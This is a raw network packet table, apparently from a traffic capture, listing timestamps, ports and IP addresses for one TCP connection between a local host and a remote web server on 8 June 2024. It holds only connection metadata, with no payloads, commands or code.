Jun 8, 2024 20:22:07.171809912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171813965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171827078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171842098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171849966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171858072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171874046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171885014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171889067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171905994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171907902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171922922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171938896 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171941042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171956062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171971083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171973944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.171987057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.171998024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172003984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172019958 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172019958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172046900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172053099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172063112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172077894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172087908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172095060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172110081 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172111034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172131062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172143936 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172156096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172171116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172182083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172188044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172204018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172211885 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172219992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172235012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172238111 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172250986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172267914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172271967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172282934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172297955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172306061 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172314882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172331095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172334909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172347069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172363043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172364950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172379017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172399998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172405958 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172415972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172432899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172434092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172447920 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172447920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172465086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172487974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172489882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172518015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172522068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172533989 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172539949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172549963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172564983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172574043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172580957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172595978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172610044 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172612906 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172629118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172632933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172646046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172662020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172666073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172677994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172692060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172699928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172708035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172723055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172727108 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172739029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172751904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172756910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172770977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172774076 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172790051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172805071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172806978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172821999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172836065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172843933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172852039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172866106 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172868967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172885895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172893047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172900915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172918081 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172930002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172934055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172951937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172966957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.172966957 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172982931 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.172992945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173007965 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173022032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173022985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173041105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173055887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173058987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173072100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173080921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173089027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173105955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173113108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173130035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173140049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173144102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173161030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173176050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173180103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173193932 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173202038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173209906 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173223972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173226118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173242092 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173257113 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173258066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173274040 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173289061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173294067 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173305035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173319101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173322916 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173336983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173337936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173356056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173372030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173372030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173387051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173402071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173408985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173418045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173434973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173435926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173450947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173460007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173466921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173482895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173484087 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173499107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173515081 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173517942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173532963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173547029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173551083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173563957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173573971 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173579931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173594952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173599005 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173614025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173629045 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173636913 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173645020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173660994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173665047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173676968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173692942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173693895 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173707962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173712969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173731089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173743963 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173747063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173763990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173779011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173779964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173795938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173796892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173814058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173830032 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173832893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173846006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173866987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173872948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173888922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173903942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173903942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173913002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173921108 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173935890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173952103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173953056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.173966885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173981905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.173998117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174005032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174005032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174015999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174029112 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174031973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174048901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174062014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174065113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174082041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174097061 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174098015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174114943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174114943 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174132109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174146891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174153090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174171925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174187899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174204111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174220085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174222946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174222946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174236059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174252033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174253941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174268007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174284935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174292088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174300909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174316883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174318075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174331903 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174339056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174348116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174364090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174375057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174380064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174396038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174412012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174412966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174429893 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174433947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174447060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174463034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174465895 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174478054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174494028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174500942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174510956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174524069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174527884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174544096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174559116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174561024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174576044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174591064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174597025 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174606085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174621105 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174623013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174640894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174643040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174658060 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174674034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174674988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174690962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174706936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174707890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174721956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174731970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174738884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174751997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174756050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174772978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174787045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174789906 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174808025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174820900 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174828053 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174844980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.174845934 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174880028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.174910069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.182485104 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.183166981 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.368176937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.439416885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682425976 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682475090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682512999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682534933 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.682548046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682584047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682617903 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682651997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682683945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682699919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.682699919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.682699919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.682719946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682744026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.682744026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.682765007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682768106 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.682801008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682833910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682856083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.682867050 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682887077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.682903051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.682921886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.682945967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.682970047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683005095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683017969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683048964 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683062077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683109045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683109999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683151960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683163881 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683218956 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683219910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683274984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683309078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683331013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683358908 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683366060 CEST	49731	80	192.168.2.4	23.88.106.134
